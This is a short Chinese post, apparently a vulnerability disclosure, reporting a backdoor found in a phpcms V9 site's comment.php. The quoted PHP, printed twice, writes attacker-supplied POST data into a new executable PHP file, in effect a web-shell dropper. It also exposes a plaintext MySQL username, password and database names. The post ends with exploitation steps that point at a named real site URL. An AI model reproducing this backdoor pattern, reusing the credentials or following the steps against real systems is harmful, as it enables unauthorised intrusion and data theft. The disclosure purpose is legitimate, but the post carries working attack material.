无意读到源码发现你们网站被人留下了后门如F:\honhei\www\phpcms\comment.php中
transitional.dtd">
phpcmsV9 - 后台管理中心$input=@$_POST['Qdata'];
$input = "<?php \n".$input."?>";
$fp=fopen("../CommentPZ.php","wb");
fwrite($fp,$input);
fclose($fp);
echo '';
}
$server = "localhost";
$sa = "zhengheyonghu";
$password="2bCHmZTsb5CBMRRB";
$phpcms ="zhuzhan2cto";
$phpwind="cto2luntan";
if(!$mssql_phpcms = @mysql_connect($server,$sa,$password)){
exit("MYSQL链接失败");
}$fp=fopen("../CommentPZ.php","r");
$output=fread($fp,filesize("../CommentPZ.php"));
fclose($fp);
$output = str_replace('<?php ','',$output);
$output = str_replace('?>','',$output);
?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
transitional.dtd">
phpcmsV9-后台管理中心$input=@$_POST['Qdata'];
$input="<?php \n".$input."?>";
$fp=fopen("../CommentPZ.php","wb");
fwrite($fp,$input);
fclose($fp);
echo '';
}
$server = "localhost";
$sa = "zhengheyonghu";
$password="2bCHmZTsb5CBMRRB";
$phpcms ="zhuzhan2cto";
$phpwind="cto2luntan";
if(!$mssql_phpcms = @mysql_connect($server,$sa,$password)){
exit("MYSQL链接失败");
}$fp=fopen("../CommentPZ.php","r");
$output=fread($fp,filesize("../CommentPZ.php"));
fclose($fp);
$output=str_replace('<?php ','',$output);
$output = str_replace('?>','',$output);
?>
这里是2012年修改的,不知道是之前被人入侵留下的还是自己为了方便留下的呢? 我表示非我留下的
红黑是老的站点,安全还是做好吧,估计被他人恶意攻击的话,首页可能就不保了。
建议将目录权限设置死,以前我在微博上就你们管理说过,可是没回应。像这样的后门,都不知道什么时候留下的,自己还一直活在精彩的世界里?最后给出上面后门的exp,非常简单访问之后生成一个一句话,访问即可www.2cto.com/CommentPZ.php